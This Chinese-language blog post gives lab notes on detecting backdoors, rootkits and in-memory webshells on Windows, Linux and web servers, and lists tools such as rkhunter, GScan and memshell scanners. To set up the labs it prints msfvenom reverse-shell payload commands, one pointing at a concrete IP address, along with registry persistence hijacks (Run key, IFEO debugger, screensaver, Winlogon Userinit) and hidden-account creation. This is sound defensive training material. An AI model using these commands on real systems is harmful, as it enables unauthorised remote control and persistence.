后门攻击检测指南--windows&Linux&web

免责声明:本文仅做技术交流与学习...

目录

Win d o w s - 后 门 - 常 规 & 权 限 维 持& 内 存 马

Lin u x - 后 门 - 常 规 & 权 限 维 持 & R o o t kit& 内 存 马

关于Rootkit的检测:

web层面-后门--内存马


Win d o w s - 后 门 - 常 规 & 权 限 维 持& 内 存 马

火绒剑--系统--开始监控 	等等 --分析进程,数字签名,对外连接,IP,	文件上传分析
火绒剑-->(自)启动项 --找找找
		隐藏用户
映像劫持	--PCHunter1.56工具

屏保&登录	--火绒剑-启动项

... 

Windows 实验 
1、常规 MSF 后门-分析检测 
2、权限维持后门-分析检测 
3、Web 程序内存马-分析检测 

常见工具集合: 
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg 

常规后门: 
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx 
lport=6666 -f exe -o shell.exe 

自启动测试: (注册表添加自启动项目)
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V 
"backdoor" /t REG_SZ /F /D "C:\shell.exe" 

隐藏账户: 
net user xiaodi$ xiaodi!@#X123 /add 

映像劫持 
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d 
"C:\Windows\System32\cmd.exe /c calc" 


屏保&登录 
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE 
/t REG_SZ /d "C:\shell.exe" /f 
REG ADD "HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D 
"C:\shell.exe" 
=============================================================================================== 

Lin u x - 后 门 - 常 规 & 权 限 维 持 & R o o t kit& 内 存 马

Linux:
msf生成elf

netstat -anpt
kill 进程号
rm 文件


rookit后门:
流量抓不到--足够隐藏
后门权限非常高	(驱动)

	
工具箱:
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg 	
rookit检测


Linux 实验 
1、常规 MSF 后门-分析检测 
2、Rootkit 后门-分析检测 
3、权限维持后门-分析检测 
4、Web 程序内存马-分析检测 
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg 

常规后门: 
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf 
Rootkit 后门:GScan rkhunter 

权限维持后门:GScan rkhunter 
1、GScan 
https://github.com/grayddq/GScan 
python GScan.py 
2、rkhunter 
wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz
tar -xvf rkhunter-1.4.6.tar.gz
cd rkhunter-1.4.6
./installer.sh   	--layout		default		--install
rkhunter -c
(集成了多个特征而已)
--检测不到啊
.
.
.

rookit  内存马  6666666666666666666

EDR?青藤?


关于Rootkit的检测:

linux平台下:chkrootkit、rkhunter、OSSEC、zeppoo等
Windows平台下:BlackLight、RootkitRevealer、Rootkit Hook Analyzer 

Gscan:GitHub - grayddq/GScan: 本程序旨在为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist的自动全面化检测,根据检测结果自动数据聚合,进行黑客攻击路径溯源。


web层面-后门--内存马

Web层面:
通用系统层面
1、常规后门
2、内存马(无文件马)
PHP	php内存马  ---146	--重启服务--再删
.NET
JAVA
Python

java内存马:
哥斯拉注入	--有不同类型
冰蝎		--

河马,,,,等等检测	--发现	有的需要dump下载下来分析		kill
(工具脚本一些不支持,中间件,语言等等)

--------------------------
手工分析:
一些不支持,就手工分析,调试
cop.jar
arthas-boot.jar		--能看到实时的内存变化



.NET: https://github.com/yzddmr6/ASP.NET-Memshell-Scanner		
asp.NET脚本 特定检测.删除	--(ASP.NET-Memshell-Scanner-master)
jsp: 	hmws工具检测(不行就运行2次试试)河马有问题...
PHP: 常规后门查杀检测后,中间件重启后删除文件即可
JAVA:河马版本,其他优秀项目
java-memshell-scanner-master工具检测tomcat.		--支持tomcat所有

相关推荐

  1. 【论文阅读】深度学习中的后门攻击综述

    2024-07-10 23:08:05       41 阅读
  2. 网安面试指南——(渗透,攻击,防御)

    2024-07-10 23:08:05       32 阅读

最近更新

  1. Underlay和Fabric

    2024-07-10 23:08:05       0 阅读
  2. uniapp使用WebSocket发消息缓慢问题

    2024-07-10 23:08:05       0 阅读
  3. web前端基础面试85题(一)

    2024-07-10 23:08:05       0 阅读
  4. SQL中的游标是什么?

    2024-07-10 23:08:05       0 阅读
  5. linux服务器防火墙添加访问白名单

    2024-07-10 23:08:05       0 阅读

热门阅读

  1. python excel openpyxl

    2024-07-10 23:08:05       7 阅读
  2. 生物环保的技术原理和优点是什么

    2024-07-10 23:08:05       10 阅读
  3. 深入理解Spring Cloud中的服务注册

    2024-07-10 23:08:05       7 阅读
  4. SIFT代码,MATLAB

    2024-07-10 23:08:05       6 阅读
  5. Scala 数据类型

    2024-07-10 23:08:05       10 阅读
  6. DP学习——简单工厂模式

    2024-07-10 23:08:05       7 阅读
  7. 从 Spark 离线数仓到 Flink 实时数仓:实战指南

    2024-07-10 23:08:05       8 阅读